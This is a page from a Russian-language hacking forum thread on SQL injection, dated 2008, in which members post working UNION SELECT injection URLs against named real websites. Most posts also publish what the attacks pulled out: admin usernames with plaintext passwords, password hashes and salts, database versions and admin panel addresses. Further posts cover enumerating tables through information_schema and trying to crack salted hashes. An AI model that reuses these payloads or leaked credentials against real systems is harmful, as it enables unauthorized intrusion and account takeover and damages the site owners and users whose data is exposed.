HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 630 из 1602 « Первая < 130530580620 626 627 628 629 630 631 632 633 634 6406807301130 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 21.08.2008, 22:15
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
С нами: 9384053

Репутация: 303
По умолчанию
http://msracing.co.uk/category.php?c_id=1)+union+select+1,2,concat(0x3a3 a,u_username,0x3a3a,u_password),4+from+users/*

http://msracing.co.uk/admin/

login:msrcng06 pass:msrcng2006
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 21.08.2008, 23:57
SVAROG
Постоянный
Регистрация: 13.02.2007
Сообщений: 406
С нами: 10126406

Репутация: 206
По умолчанию
http://www.breitbart.com/print.php?id=D8QRMCU00%27+union+select+1,2,3,4,5,6 ,7,8,9,0,version(),2/*
4.1.20-log
 
Ответить с цитированием

  #3  
Старый 22.08.2008, 00:38
Elephant
Новичок
Регистрация: 31.07.2008
Сообщений: 11
С нами: 9356820

Репутация: -3
По умолчанию
Заметьте, проект САМЫЙ крупный который посвящён серии GTA

http://gta.com.ua/file_sa_details.phtml?id=59'
 
Ответить с цитированием

  #4  
Старый 22.08.2008, 00:57
4p3
Участник форума
Регистрация: 18.08.2008
Сообщений: 159
С нами: 9332069

Репутация: 92
По умолчанию
Цитата:
Сообщение от Elephant  
Заметьте, проект САМЫЙ крупный который посвящён серии GTA

http://gta.com.ua/file_sa_details.phtml?id=59'
Раскрутил бы до конца что ли...

http://gta.com.ua/file_sa_details.phtml?id=999+union+select+1,2,3,co ncat_ws(0x3a3a,username,password),5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20+from+admin/*

Версия: 4.
Login:admin
Password hash:2IsfJILPkOJ2 (DES??)

http://gta.com.ua/admin -> Access Denied, потому никакого смысла нема. Разве что на форуме стоит ipb 2. Можно из for_members_converge вытянуть соль и хэшик.
 
Ответить с цитированием

  #5  
Старый 24.08.2008, 17:42
Elephant
Новичок
Регистрация: 31.07.2008
Сообщений: 11
С нами: 9356820

Репутация: -3
По умолчанию
Цитата:
Сообщение от 4p3  
Раскрутил бы до конца что ли...

http://gta.com.ua/file_sa_details.phtml?id=999+union+select+1,2,3,co ncat_ws(0x3a3a,username,password),5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20+from+admin/*

Версия: 4.
Login:admin
Password hash:2IsfJILPkOJ2 (DES??)

http://gta.com.ua/admin -> Access Denied, потому никакого смысла нема. Разве что на форуме стоит ipb 2. Можно из for_members_converge вытянуть соль и хэшик.
Ракрутил с помощью ачатовца)))
А из форума ничё не выудил, а админка стоит огронечитель по IP, обидно блин! хотя взломать то можно, только сплоита под версию того форума я не нашел((((
 
Ответить с цитированием

  #6  
Старый 23.08.2008, 09:49
Nea7
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
С нами: 9828237

Репутация: 778
По умолчанию
Цитата:
Сообщение от softrix  
А какой запрос для просмотра баз данных, если не секрет?
-1+union+select+111,222,333,table_schema,555,666+fr om+information_schema.tables+where+table_name=0x75 73657273
 
Ответить с цитированием

  #7  
Старый 22.08.2008, 15:32
nicusor
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
С нами: 9550090

Репутация: 137
По умолчанию
http://www.fbmbmx.com/news.php?newsid=1296+and+1=2+union+select+1,concat _ws(0x3a,user(),version(),database()),3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*

user() = fbmbmx@localhost
version() = 4.1.21-log
database() = fbmbmx

admins
name:password

mike:erb9768
john:lee7124
steve:crandall4776
tom:blyth24
mikefixed:erb9768
Последний раз редактировалось nicusor; 22.08.2008 в 15:48..
 
Ответить с цитированием

  #8  
Старый 22.08.2008, 23:46
DTW
Участник форума
Регистрация: 11.05.2008
Сообщений: 202
С нами: 9473484

Репутация: 104
По умолчанию
Цитата:
http://www.planeta-lv.com/index_flash.php?page=1&sub=1'+union+select+1,2,3,4 ,5,6,7,8,TABLE_NAME,0,1,2,3+FROM+INFORMATION_SCHEM A.TABLES/*

планета
 
Ответить с цитированием

  #9  
Старый 23.08.2008, 01:02
softrix
Новичок
Регистрация: 05.07.2008
Сообщений: 16
С нами: 9395645

Репутация: 7
По умолчанию
Вот инъект на порносайте, интересно конечно в админку было бы влезть, но соленый хэш
И не известно как соленый, да еще соль похоже хэшированая, а где чистая соль лежит не нашел еще !

http://novoporn.com/index.php?action=image&id=-16323+union+select+1,concat(id,char(58,58,58),logi nname,char(58,58,58),password,char(58,58,58),salt, char(58,58,58),title,char(58,58,58),firstname,char (58,58,58),lastname,char(58,58,58),email,char(58,5 8,58),inactive),3+from+cfw_auth_login

name::ass:::salt
admin:::32d22edc834dbe06bef10ffb7cb148e1:::b7f4cf8 29896e1ccbfbc63c934077c6c
 
Ответить с цитированием

  #10  
Старый 23.08.2008, 05:04
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
С нами: 9384053

Репутация: 303
По умолчанию
Китайский банннер-эксчендж
login:mintruder pass:django1'

http://www.banner4banner.ch/view.php?e=1&t=_blank&c=i&b=-1+union+select+1,2,concat(username,0x3a3a,password ),4,5,6,7,8,9,10,11,12,13,14+from+user+limit+0,20/*

в 0 лимите лежит админ, но не брутится сволота... =)
 
Ответить с цитированием
Ответ
Страница 630 из 1602 « Первая < 130530580620 626 627 628 629 630 631 632 633 634 6406807301130 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.